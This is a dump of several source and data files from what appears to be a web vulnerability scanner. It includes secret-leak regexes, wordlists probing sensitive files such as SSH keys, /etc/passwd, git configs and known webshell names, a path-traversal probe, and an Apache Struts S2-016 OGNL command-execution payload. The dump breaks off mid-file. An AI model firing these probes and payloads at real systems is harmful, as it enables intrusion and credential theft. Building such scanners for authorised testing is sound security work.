r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+\.(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me)', 49 | # 匹配token或者密码泄露 50 | # 例如token = xxxxxxxx, 或者"apikey" : "xssss" 51 | r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|extr|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|qid|api_key|apikey|userid|user_id|user-id|uid|private|BDUSS|stoken|imei|imsi|nickname|appid|uname)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}', 52 | # 匹配 53 | r'(?:[^a-fA-F\d]|\b)(?:[a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)', 54 | # 匹配 "/task/router" 这种路径 55 | r'"(/\w{3,}/\w{3,})"', 56 | # 匹配IP地址 57 | r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b', 58 | # 匹配云泄露 59 | r'[\w]+\.cloudfront\.net', 60 | r'[\w\-.]+\.appspot\.com', 61 | r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*', 62 | r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)', 63 | r'(storage\.cloud\.google\.com\/[\w\-.]+)', 64 | r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)', 65 | # 匹配手机号 66 | r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}' 67 | # 匹配域名 68 | r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))' 69 | ) 70 | for _ in regex: 71 | text = re.findall(_, r.text[:100000], re.M | re.I) 72 | if text is not None and verify(text): 73 | text = list(map(lambda x: url + ' Leaks: ' + x, text)) 74 | self.result.extend(text) 75 | 76 | 77 | if __name__ == "__main__": 78 | start_time = time.time() 79 | urls1 = ['https://www.baidu.com'] 80 | jsparse = JsLeaks().pool(urls1) 81 | print(jsparse) 82 | end_time = time.time() 83 | print('\nrunning {0:.3f} seconds...'.format(end_time - start_time)) 84 | -------------------------------------------------------------------------------- /data/path/other.txt: -------------------------------------------------------------------------------- 1 | /WEB-INF/classes/dataBase.properties 2 | /WEB-INF/conf/database_config.properties 3 | /.ssh/id_rsa.pub 4 | /resin-doc 5 | /WEB-INF/conf/activemq.xml 6 | /js/browsers.js 7 | /ClientAccessPolicy.xml 8 | /Public/js/weibologin.js 9 | /package.rar 10 | /package.tgz 11 | /WEB-INF/classes/data.properties 12 | /WEB-INF/spring.xml 13 | /src.tar.gz 14 | /invoker/JMXInvokerServlet 15 | /crossdomain.xml 16 | /.ssh/id_dsa 17 | /resource/js/cj.js 18 | /setup.sh 19 | /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/profile 20 | /old.tar.bz2 21 | /application/configs/application.ini 22 | /WEB-INF/dwr.xml 23 | /htpasswd.bak 24 | /axis2-web/css/axis-style.css 25 | /WEB-INF/classes/conf/jdbc.properties 26 | /backup.sql.gz 27 | /index.tar.tz 28 | /readme.md 29 | /.git/index 30 | /.idea/workspace.xml 31 | /database.yml 32 | /bakup.hp 33 | /WEB-INF/struts-front-config.xml 34 | /.htpasswd 35 | /WEB-INF/config/data/dataSource.xml 36 | /WEB-INF/classes/data.xml 37 | /proc/meminfo 38 | /ying.PhP 39 | /httpd.conf 40 | /app.cfg 41 | /WEB-INF/config/dbconfig 42 | /data.ini 43 | /.ssh/known_hosts 44 | /sitemap.xml 45 | /.idea/scopes/scope_settings.xml 46 | /fvzrx13171.jpg 47 | /WEB-INF/classes/conf/spring/applicationContext-datasource.xml 48 | /htaccess.bak 49 | /build.tar.gz 50 | /etc/profile 51 | /WEB-INF/classes/applicationContext.xml 52 | /resin-admin 53 | /crazy7.jpg 54 | /.bash_logout 55 | /.bashrc 56 | /a.out 57 | /javax.faces.resource...%2fWEB-INF/web.xml.jsf 58 | /WEB-INF/classes/application.properties 59 | /config.ini 60 | /local.conf 61 | /jbossmq-httpil/HTTPServerILServlet 62 | /.idea/modules.xml 63 | /config.json 64 | /web.config 65 | /WEB-INF/web.xml.bak 66 | /code.tar.gz 67 | /jenkins/static/f3a41d2f/css/style.css 68 | /.git/HEAD 69 | /data.conf 70 | /web-console/Invoker 71 | /.gitignore 72 | /o.tar.gz 73 | /configuration.ini 74 | /readme.html 75 | /server.xml 76 | /WEB-INF/classes/hibernate.cfg.xml 77 | /conf.ini 78 | /userAction.struts 79 | /jmx-console/HtmlAdaptor 80 | /wp-config.bak 81 | /WEB-INF/struts/struts-config.xml 82 | /manage/html 83 | /package.zip 84 | /WEB-INF/classes/security.properties 85 | /.svn/wc.data 86 | /console/css/login.css 87 | /jmx-console 88 | /dump.sql.gz 89 | /static/f3a41d2f/css/style.css 90 | /admin-console 91 | /.idea/.name 92 | /.DS_Store 93 | /upload.sh 94 | /WEB-INF/classes/rabbitmq.xml 95 | /database.sql.gz 96 | /WEB-INF/classes/config/applicationContext.xml 97 | /crazy3.jpg 98 | /WEB-INF/database.properties 99 | /manager/html 100 | /WEB-INF/classes/struts.xml 101 | /.vimrc 102 | /CVS/Root 103 | /settings.ini 104 | /tools.tar.gz 105 | /install.sh 106 | /.history 107 | /WEB-INF/classes/spring.xml 108 | /package.tar.bz2 109 | /INSTALL.TXT 110 | /.git/config 111 | /examples/servlets/servlet/SessionExample 112 | /conf/config.ini 113 | /.bzr 114 | /conf.tar.gz 115 | /fckeditor/_samples/default.html 116 | /deploy.tar.gz 117 | /ueditor/ueditor.config.js 118 | /WEB-INF/config.xml 119 | /wp-admin 120 | /struts/webconsole.html 121 | /.htaccess 122 | /package.tar.gz 123 | /invoker/EJBInvokerServlet 124 | /imbsb17357.jpg 125 | /README.md 126 | /failure.json 127 | /axis2-admin 128 | /config.inc 129 | /media/system/js/caption.js 130 | /rsync.sh 131 | /LoginHandler.ashx 132 | /WEB-INF/struts-config.xml 133 | /.rediscli_history 134 | /config/database.yml 135 | /rjrzk86964.jpg 136 | /WEB-INF/spring-cfg/applicationContext.xml 137 | /mt-upgrade.cgi 138 | /data.sqlite 139 | /.mysql_history 140 | /pool.sh 141 | /test2.html 142 | /WEB-INF/classes/struts_manager.xml 143 | /crazy6.jpg 144 | /.bash_history 145 | /invoker/readonly 146 | /WEB-INF/applicationContext-slave.xml 147 | /jenkins/script 148 | /.ssh/id_rsa 149 | /xianf.ASP 150 | /WEB-INF/log4j.properties 151 | /WEB-INF/web.xml 152 | /etc/passwd 153 | /.ssh/authorized_keys 154 | /favicon.ico 155 | /help/io_login.html 156 | /WEB-INF/applicationContext.xml 157 | /.ssh/id_dsa.pub 158 | /WEB-INF/web.properties 159 | /CVS/Entries 160 | /app.config 161 | /server-status 162 | /config/config.ini 163 | /.bash_profile 164 | /app.ini 165 | /sftp-config.json 166 | /deploy.sh 167 | /sync.sh 168 | /static/js/admincp.js 169 | /.svn/entries 170 | /conf/conf.zip 171 | /wp-config.inc 172 | /data.sql.gz 173 | /66.ashx 174 | /index.cgi.bak 175 | /.hg 176 | /.htpasswd.bak 177 | /application.ini 178 | /WEB-INF/classes/jdbc.properties 179 | /output.tar.gz 180 | /proxy.pac 181 | /WEB-INF/classes/conf/datasource.xml 182 | /backup.sh 183 | /server.cfg 184 | /configs/application.ini 185 | /server-info/struts/webconsole.html 186 | /pangca.PHp 187 | /x.tar.gz 188 | /nohup.out 189 | /index.htm 190 | /change_lan.php?LanID=../../../../../../../../../etc/passwd%00 -------------------------------------------------------------------------------- /analyzer.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | import os 3 | import re 4 | from collections import Counter 5 | 6 | from lib.bcolors import Bcolors 7 | from lib.sqldb import Sqldb 8 | 9 | dbname = 'result' 10 | 11 | if os.path.exists('output.log'): 12 | os.remove('output.log') 13 | 14 | 15 | def get_top(result): 16 | out = [] 17 | count = Counter(result) 18 | L = sorted(count.items(), key=lambda item: item[1], reverse=True) 19 | L = L[:10] 20 | for i in L: 21 | app, appnum = i 22 | out.append('{}|{}'.format(app,appnum)) 23 | return out 24 | 25 | 26 | def get_cidr(iplist): 27 | cidrs = [] 28 | for ip in iplist: 29 | cidr = re.sub(r'\d+$', '0/24', ip) 30 | cidrs.append(ipaddress.ip_network(cidr)) 31 | 32 | result = [] 33 | 34 | for cidr in cidrs: 35 | for i in iplist: 36 | ip = ipaddress.ip_address(i) 37 | if ip in cidr: 38 | result.append(str(cidr)) 39 | break 40 | out = get_top(result) 41 | for i in out: 42 | cidr, num = i.split('|') 43 | print(cidr, num) 44 | 45 | 46 | def query(): 47 | print(Bcolors.RED + '网站数量:' + Bcolors.ENDC) 48 | sql = 'select count(*) from webinfo' 49 | _ = Sqldb(dbname).query(sql) 50 | print(_[0][0]) 51 | sql = 'select service,count(service) as num from ports group by service order by num DESC' 52 | service = Sqldb(dbname).query(sql) 53 | print(Bcolors.RED + '服务统计:' + Bcolors.ENDC) 54 | for i in service: 55 | print(i[0], i[1]) 56 | print(Bcolors.RED + 'Webinfo:' + Bcolors.ENDC) 57 | sql = 'select apps from webinfo where apps is not null' 58 | webinfo = Sqldb(dbname).query(sql) 59 | result = [] 60 | for i in webinfo: 61 | result.extend(i[0].split(' , ')) 62 | out = get_top(result) 63 | for j in out: 64 | cms,count = j.split('|') 65 | print(cms,count) 66 | print(Bcolors.RED + '端口统计:' + Bcolors.ENDC) 67 | sql = 'select port,count(port) as num from ports group by port order by num DESC limit 0,20' 68 | ports = Sqldb(dbname).query(sql) 69 | for i in ports: 70 | print(i[0], i[1]) 71 | print(Bcolors.RED + 'C段统计:' + Bcolors.ENDC) 72 | cidrs = [] 73 | sql = 'select ipaddr from webinfo order by ipaddr' 74 | cidr = Sqldb(dbname).query(sql) 75 | for i in cidr: 76 | cidrs.append(i[0]) 77 | get_cidr(cidrs) 78 | print(Bcolors.RED + '可疑URL:' + Bcolors.ENDC) 79 | sql = "select domain,title,url,contype,rsp_len,rsp_code from urls where contype!='html' and contype !='vnd.microsoft.icon' and contype !='plain'" 80 | urls = Sqldb(dbname).query(sql) 81 | for i in urls: 82 | domain, title, url, contype, rsp_len, rsp_code = i 83 | if rsp_code == '200' and contype != 'None': 84 | print(domain, title, url, contype, rsp_len, rsp_code) 85 | print(Bcolors.RED + 'WAF:' + Bcolors.ENDC) 86 | sql = 'select waf,count(waf) as num from webinfo where waf is not NULL group by waf order by num DESC' 87 | waf = Sqldb(dbname).query(sql) 88 | for i in waf: 89 | print(i[0], i[1]) 90 | print(Bcolors.RED + '地区分布:' + Bcolors.ENDC) 91 | sql = 'select address,count(address) as num from webinfo where address is not NULL group by address order by num DESC limit 0,20' 92 | country = Sqldb(dbname).query(sql) 93 | for i in country: 94 | print(i[0], i[1]) 95 | 96 | 97 | def gener(): 98 | f = open('output.log', 'a', encoding='utf-8') 99 | webinfo = Sqldb(dbname).query('select domain,ipaddr,title,server,apps,waf,os from webinfo') 100 | for i in webinfo: 101 | domain, ipaddr, title, server, apps, waf, os = i 102 | print('\n' + '*' * 40 + ' ' + domain + ' ' + '*' * 40) 103 | f.write('\n' + '*' * 40 + ' ' + domain + ' ' + '*' * 40 + '\n') 104 | print('{}|{}|{}|{}|{}'.format(domain, ipaddr, title, server, waf)) 105 | f.write('{}|{}|{}|{}|{}'.format(domain, ipaddr, title, server, waf) + '\n') 106 | print('指纹:' + str(apps)) 107 | f.write('指纹:' + str(apps) + '\n') 108 | print('操作系统:' + str(os)) 109 | f.write('操作系统:' + str(os) + '\n') 110 | ports = Sqldb(dbname).query(f"select ipaddr,service,port from ports where ipaddr = '{domain}'") 111 | for port in ports: 112 | domain, server, port = port 113 | print(domain, server, port) 114 | f.write('{}\t{}\t{}'.format(domain, server, port) + '\n') 115 | urls = Sqldb(dbname).query(f"select title,url,contype,rsp_len,rsp_code from urls where domain = '{domain}'") 116 | for url in urls: 117 | title, url, contype, rsp_len, rsp_code = url 118 | print('{}\t{}\t{}\t{}t{}'.format(title, url, contype, rsp_len, rsp_code)) 119 | f.write('{}\t{}\t{}\t{}t{}'.format(title, url, contype, rsp_len, rsp_code) + '\n') 120 | vulns = Sqldb(dbname).query(f"select vuln from vuln where domain = '{ipaddr}'") 121 | for vuln in vulns: 122 | print(vuln[0]) 123 | f.write(vuln[0] + '\n') 124 | 125 | 126 | if __name__ == "__main__": 127 | query() 128 | -------------------------------------------------------------------------------- /lib/Requests.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | import hashlib 4 | import logging 5 | import random 6 | import re 7 | import socket 8 | import ssl 9 | 10 | import OpenSSL 11 | import requests 12 | import socks 13 | import urllib3 14 | 15 | from lib.random_header import get_ua 16 | from lib.settings import TIMEOUT, COOKIE, SOCKS5 17 | 18 | 19 | def verify(url): 20 | if not re.search('http:|https:', url): 21 | url = 'http://' + url 22 | return url 23 | 24 | 25 | class Requests: 26 | def __init__(self): 27 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 28 | requests.packages.urllib3.disable_warnings() 29 | 30 | self.timeout = TIMEOUT 31 | self.session = requests.Session() 32 | self.headers = get_ua() 33 | 34 | if COOKIE == 'random': 35 | plain = ''.join([random.choice('0123456789') for _ in range(8)]) 36 | md5sum = hashlib.md5() 37 | md5sum.update(plain.encode('utf-8')) 38 | md5 = md5sum.hexdigest() 39 | self.headers.update({'Cookie': 'SESSION=' + md5}) 40 | else: 41 | self.headers.update(COOKIE) 42 | 43 | if SOCKS5: 44 | ip, port = SOCKS5 45 | socks.set_default_proxy(socks.SOCKS5, ip, port) 46 | socket.socket = socks.socksocket 47 | 48 | def scan(self, url): 49 | url = verify(url) 50 | try: 51 | r = self.session.get(url, 52 | timeout=self.timeout, 53 | headers=self.headers, 54 | verify=False, 55 | stream=True, 56 | allow_redirects=False) 57 | return r 58 | 59 | except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout, 60 | requests.exceptions.SSLError, requests.exceptions.ConnectionError, ssl.SSLError, AttributeError, 61 | ConnectionRefusedError, socket.timeout, urllib3.exceptions.ReadTimeoutError, OpenSSL.SSL.WantReadError, 62 | urllib3.exceptions.DecodeError, requests.exceptions.ContentDecodingError): 63 | pass 64 | except Exception as e: 65 | logging.exception(e) 66 | 67 | def get(self, url): 68 | url = verify(url) 69 | try: 70 | r = self.session.get(url, timeout=self.timeout, headers=self.headers, verify=False, allow_redirects=False) 71 | return r 72 | except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout, 73 | requests.exceptions.SSLError, requests.exceptions.ConnectionError, ssl.SSLError, AttributeError, 74 | ConnectionRefusedError, socket.timeout, urllib3.exceptions.ReadTimeoutError, OpenSSL.SSL.WantReadError, 75 | urllib3.exceptions.DecodeError, requests.exceptions.ContentDecodingError): 76 | pass 77 | except Exception as e: 78 | logging.exception(e) 79 | 80 | def post(self, url, data): 81 | url = verify(url) 82 | try: 83 | r = self.session.post(url, 84 | data=data, 85 | timeout=self.timeout, 86 | headers=self.headers, 87 | verify=False, 88 | allow_redirects=False) 89 | return r 90 | except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout, 91 | requests.exceptions.SSLError, requests.exceptions.ConnectionError, ssl.SSLError, AttributeError, 92 | ConnectionRefusedError, socket.timeout, urllib3.exceptions.ReadTimeoutError, OpenSSL.SSL.WantReadError, 93 | urllib3.exceptions.DecodeError, requests.exceptions.ContentDecodingError): 94 | pass 95 | except Exception as e: 96 | logging.exception(e) 97 | 98 | def request(self, url, method, data=None, headers=None): 99 | url = verify(url) 100 | try: 101 | if method == 'get': 102 | r = self.session.get(url, timeout=self.timeout, headers=headers, verify=False, allow_redirects=True) 103 | return r 104 | else: 105 | r = self.session.post(url, 106 | data=data, 107 | timeout=self.timeout, 108 | headers=headers, 109 | verify=False, 110 | allow_redirects=False) 111 | return r 112 | except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout, requests.exceptions.Timeout, 113 | requests.exceptions.SSLError, requests.exceptions.ConnectionError, ssl.SSLError, AttributeError, 114 | ConnectionRefusedError, socket.timeout, urllib3.exceptions.ReadTimeoutError, OpenSSL.SSL.WantReadError, 115 | urllib3.exceptions.DecodeError, requests.exceptions.ContentDecodingError): 116 | pass 117 | except Exception as e: 118 | logging.exception(e) 119 | -------------------------------------------------------------------------------- /plugins/ActiveReconnaissance/active.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import concurrent.futures 6 | import logging 7 | import platform 8 | import re 9 | import subprocess 10 | import time 11 | import xml 12 | from urllib import parse 13 | 14 | import dns.resolver 15 | import nmap 16 | 17 | from lib.cli_output import console 18 | from lib.settings import PING, CHECK_DB, VERIFY_COUNTRY 19 | from lib.sqldb import Sqldb 20 | from lib.verify import verify_country 21 | from lib.whiteip import WhiteIP 22 | 23 | 24 | class ActiveCheck: 25 | def __init__(self, hosts): 26 | self.hosts = hosts 27 | self.out = [] 28 | 29 | def check_db(self, hosts): 30 | self.out = Sqldb('result').query_db(hosts) 31 | 32 | def check(self, url): 33 | loc = parse.urlparse(url) 34 | if getattr(loc, 'netloc'): 35 | host = loc.netloc 36 | else: 37 | host = loc.path 38 | 39 | # 验证国家 40 | if VERIFY_COUNTRY: 41 | if verify_country(host): 42 | console('Disable', host, "Disable Country\n") 43 | return False 44 | 45 | if re.search(r'\d+\.\d+\.\d+\.\d+', host): 46 | if not WhiteIP().checkip(host): 47 | console('Disable', host, "China IP\n") 48 | return False 49 | 50 | if re.search(r'\.org\.cn|\.com\.cn|\.cn|gov\.cn|edu\.cn|\.mil|\.aero|\.int|\.go\.\w+$|\.ac\.\w+$', host): 51 | console('Disable', host, "Do not scan this domain\n") 52 | return False 53 | 54 | try: 55 | # 判断是IP还是域名,域名的话需要检测域名解析 56 | if not re.search(r'\d+\.\d+\.\d+\.\d+', host): 57 | # 验证DNS存活并且DNS解析不能是一些特殊IP(DNSIP、内网IP) 58 | console('Dnscheck', host, 'query dns a records\n') 59 | resolver = dns.resolver.Resolver() 60 | resolver.nameservers = ['1.1.1.1', '8.8.8.8'] 61 | a = resolver.query(host, 'A') 62 | for i in a.response.answer: 63 | for j in i.items: 64 | if hasattr(j, 'address'): 65 | # if re.search(r'\d+\.\d+\.\d+\.\d+', j.address): 66 | # if not WhiteIP().checkip(j.address): 67 | # console('Disable', j.address, "China IP\n") 68 | # return False 69 | if re.search(r'1\.1\.1\.1|8\.8\.8\.8|127\.0\.0\.1|114\.114\.114\.114|0\.0\.0\.0', 70 | j.address): 71 | return False 72 | if PING: 73 | try: 74 | # Windows调用ping判断存活 Linux调用nmap来判断主机存活 75 | # nmap判断存活会先进行ping然后连接80端口,这样不会漏掉 76 | if platform.system() == 'Windows': 77 | console('PING', host, 'Ping scan\n') 78 | subprocess.check_output(['ping', '-n', '2', '-w', '1', host]) 79 | self.out.append(url) 80 | else: 81 | console('PING', host, 'Nmap Ping scan\n') 82 | nm = nmap.PortScanner() 83 | result = nm.scan(hosts=host, arguments='-sP -n') 84 | for k, v in result.get('scan').items(): 85 | if not v.get('status').get('state') == 'up': 86 | console('PING', host, "is not alive\n") 87 | return False 88 | else: 89 | self.out.append(url) 90 | 91 | except (AttributeError, subprocess.CalledProcessError, xml.etree.ElementTree.ParseError, 92 | nmap.nmap.PortScannerError): 93 | console('PING', host, "is not alive\n") 94 | return False 95 | except Exception as e: 96 | logging.exception(e) 97 | return False 98 | 99 | else: 100 | self.out.append(url) 101 | except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN, dns.resolver.NoNameservers): 102 | console('DnsCheck', host, "No A record\n") 103 | except dns.exception.Timeout: 104 | console('DnsCheck', host, "Timeout\n") 105 | except Exception as e: 106 | logging.exception(e) 107 | return False 108 | 109 | def pool(self): 110 | try: 111 | with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: 112 | result = {executor.submit(self.check, i): i for i in self.hosts} 113 | for future in concurrent.futures.as_completed(result, timeout=3): 114 | future.result() 115 | except (EOFError, concurrent.futures._base.TimeoutError): 116 | pass 117 | except Exception as e: 118 | logging.exception(e) 119 | 120 | if CHECK_DB: 121 | self.check_db(list(set(self.out))) 122 | 123 | return self.out 124 | 125 | 126 | if __name__ == "__main__": 127 | start_time = time.time() 128 | active_hosts = ActiveCheck(['1.1.1.1']).pool() 129 | end_time = time.time() 130 | print(active_hosts) 131 | print('\nrunning {0:.3f} seconds...'.format(end_time - start_time)) 132 | -------------------------------------------------------------------------------- /data/path/php.txt: -------------------------------------------------------------------------------- 1 | /phpMyAdmin 2 | /xmlrpc.php 3 | /phpinfo.php 4 | /memadmin/index.php 5 | /pma/index.php 6 | /phpMyAdmin/index.php 7 | /.mysql.php.swp 8 | /.data.php.swp 9 | /.database.php.swp 10 | /.settings.php.swp 11 | /.config.php.swp 12 | /config/.config.php.swp 13 | /.config.inc.php.swp 14 | /config.inc.php.bak 15 | /php.ini 16 | /wp-config.php 17 | /configuration.php 18 | /sites/default/settings.php 19 | /config.php 20 | /config.inc.php 21 | /data/config.php 22 | /data/config.inc.php 23 | /data/common.inc.php 24 | /include/config.inc.php 25 | /mysql.php 26 | /apc.php 27 | /upfile.php 28 | /b.php 29 | /data.php.bak 30 | /config/config.php 31 | /ckeditor/samples/sample_posteddata.php 32 | /sql.php 33 | /test2.php 34 | /phpmyadmin/index.php 35 | /x.php 36 | /index.php.bak 37 | /config.php.bak 38 | /t.php 39 | /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php 40 | /ueditor/php/getRemoteImage.php 41 | /.index.php.swp 42 | /editor/ckeditor/samples/sample_posteddata.php 43 | /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php 44 | /php.php 45 | /debug.php 46 | /pi.php 47 | /_phpmyadmin/index.php 48 | /cmdxway.php 49 | /wp-config.php.inc 50 | /.wp-config.php.swp 51 | /wp-config.php.bak 52 | /inc/config.inc.php 53 | /License/index.php 54 | /igenus/login.php 55 | /webmail/index.php 56 | /index.php/chuhades 57 | /index.php?m=admin 58 | /test1.php 59 | /phpinfo1.php 60 | /info1.php 61 | /phpversion.php 62 | /wbl.php 63 | /mytag_js.php 64 | /out.php 65 | /index.php 66 | /mp.php 67 | /laobiao.php 68 | /90sec.php 69 | /e7xue.php 70 | /xsvip.php 71 | /md5.php 72 | /xiaoy.php 73 | /read.php 74 | /moon.php 75 | /result.php 76 | /m7lrv.php 77 | /web.php 78 | /1.php 79 | /asd.php 80 | /mybak.php 81 | /backup.php 82 | /login.php 83 | /myjs.php 84 | /lequ.php 85 | /uploadye.php 86 | /404.php 87 | /ad_js.php 88 | /coon.php 89 | /Config_Shell.php 90 | /bakup.php 91 | /ioandlko.php 92 | /weki.php 93 | /css.php 94 | /admin_login.php 95 | /date.php 96 | /link.php 97 | /service.php 98 | /sky.php 99 | /spider.php 100 | /tag.php 101 | /functions.php 102 | /myships.php 103 | /97sec.php 104 | /coco.php 105 | /av.php 106 | /mycak.php 107 | /akismet.php 108 | /cm.php 109 | /gh.php 110 | /da.php 111 | /mb.php 112 | /config_updat.php 113 | /Thumbs.php 114 | /shingeng_ukl.php 115 | /shell.php 116 | /funstats.php 117 | /selectgino.php 118 | /conn.lib.php 119 | /menb.php 120 | /newfile.php 121 | /config.in.php 122 | /config2.php 123 | /xiaoma.php 124 | /left.php 125 | /c.php 126 | /indexl.php 127 | /dede.php 128 | /HENYG.php 129 | /90000.php 130 | /digg.php 131 | /qingtian.php 132 | /userr.php 133 | /login_wall.php 134 | /xx.php 135 | /3.php 136 | /inCahe.php 137 | /system.php 138 | /tnsado.php 139 | /lx.php 140 | /Hzllaga.php 141 | /en.php 142 | /xiaolei.php 143 | /zdqd.php 144 | /rom2823.php 145 | /shitan.php 146 | /top.php 147 | /eval-stdin.php 148 | /confg.inc.php 149 | /test404.php 150 | /filter.helpear.php 151 | /indexa.php 152 | /cmd.php 153 | /uddatasql.php 154 | /word.php 155 | /modurnlecscache.php 156 | /aa.php 157 | /fuck.php 158 | /lucas.php 159 | /seo.php 160 | /flye.php 161 | /suimaoye.php 162 | /base.php 163 | /hxgs.php 164 | /user.php 165 | /words.php 166 | /d.php 167 | /___index.php 168 | /admin.lnc.php 169 | /11m.php 170 | /robots1.php 171 | /mowang.php 172 | /ping.php 173 | /test.php 174 | /bat.php 175 | /footer.php 176 | /stepselet.lib.php 177 | /css_js.php 178 | /3G.php 179 | /good.php 180 | /mcds.php 181 | /hzapi.php 182 | /news.php 183 | /cons.php 184 | /gou.php 185 | /network_lang.php 186 | /database.php 187 | /ms.php 188 | /scan.php 189 | /shopex49.php 190 | /tags.php 191 | /ofc_upload_image.php 192 | /api.php 193 | /zixunpt.php 194 | /error-log.php 195 | /cachee.php 196 | /Pathes.php 197 | /sfn.php 198 | /01.php 199 | /indax.php 200 | /log.php 201 | /config_ucenter.php 202 | /dest.php 203 | /winge.php 204 | /pdf.php 205 | /shantao.php 206 | /sqzr.php 207 | /12345.php 208 | /dict.php 209 | /member.php 210 | /canshi.php 211 | /i.php 212 | /404test.php 213 | /21.php 214 | /inc.constants.php 215 | /lie.php 216 | /usr.php 217 | /xxx.php 218 | /diy.php 219 | /php_meter.php 220 | /phpjm.php 221 | /rss.tpl.php 222 | /config_data.php 223 | /mcli.php 224 | /me.php 225 | /webb.php 226 | /xm.php 227 | /yesu.php 228 | /admin.php 229 | /dialog_sides.php 230 | /income.inc.php 231 | /que.php 232 | /lunqiaofan.php 233 | /bafang.php 234 | /lu.php 235 | /pmo.php 236 | /class.php 237 | /myship.php 238 | /product.php 239 | /qode.php 240 | /cishan.php 241 | /plus_ask.php 242 | /cai.php 243 | /diaosi.php 244 | /lists.php 245 | /samplc.php 246 | /search.php 247 | /datas.php 248 | /diretory.php 249 | /flock.php 250 | /memChk1.php 251 | /small.php 252 | /zhuogouxi.php 253 | /91_1.php 254 | /buy.php 255 | /caicai.php 256 | /cookie.helpea.php 257 | /favicon.php 258 | /testpass.php 259 | /Admin_.php 260 | /assert.php 261 | /memChk21.php 262 | /pass.php 263 | /shell.lib.php 264 | /NewFile.php 265 | /a.php 266 | /editor.php 267 | /jz.php 268 | /l0s4r.php 269 | /qwe123.php 270 | /resd.php 271 | /specialtopic.php 272 | /vdimgck.php 273 | /accw.php 274 | /adsitemList.php 275 | /cachedata.end.php 276 | /cituxian.php 277 | /editpwwd.php 278 | /imgarl.php 279 | /info.php 280 | /memChk.php 281 | /test8319.php 282 | /trigger.php 283 | /wall_login.php 284 | /xie.php 285 | /zhuitanyun.php 286 | /about_safe_key.php 287 | /fix.php 288 | /jian.php 289 | /modules.php 290 | /time.php 291 | /tyuij.php 292 | /zhang.php 293 | /Common.php 294 | /andeveoyou.php 295 | /bigdata2018.php 296 | /4.php 297 | /php-cgi 298 | /php.cgi 299 | /tunnel.nosocket.php 300 | /ajax_create_folder.php 301 | /anchor.php 302 | /feedback.php 303 | /soap.php 304 | /?phpinfo=1 305 | /excel/sso_user_export.php 306 | /excel/user_export.php 307 | /excel/server_export.php 308 | /chrome.php 309 | /chrome1.php 310 | /index1.php 311 | /cmd2.php 312 | /cmd3.php -------------------------------------------------------------------------------- /script/apache_struts_all.py: -------------------------------------------------------------------------------- 1 | # author: al0ne 2 | # https://github.com/al0ne 3 | 4 | import random 5 | import http.client 6 | from urllib import request 7 | from lib.Requests import Requests 8 | from lib.verify import get_list 9 | 10 | vuln = ['java', 'jsp'] 11 | 12 | 13 | class StrutsCheck: 14 | def __init__(self, ip): 15 | self.url = ip 16 | self.result = [] 17 | self.random = random.randint(100000000, 200000000) 18 | self.win = 'set /a ' + str(self.random) 19 | self.linux = 'echo ' + str(self.random) 20 | self.timeout = 3 21 | self.req = Requests() 22 | 23 | def st016(self): 24 | payload = r"/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27" + self.linux + "%27%29.getInputStream%28%29%29%7D" 25 | try: 26 | r = self.req.get(self.url + payload) 27 | if str(self.random) in r.headers['Location'] and len(r.headers['Location']) < 15: 28 | self.result.append('Apache S2-016 Vulnerability: ' + self.url) 29 | except: 30 | pass 31 | 32 | def 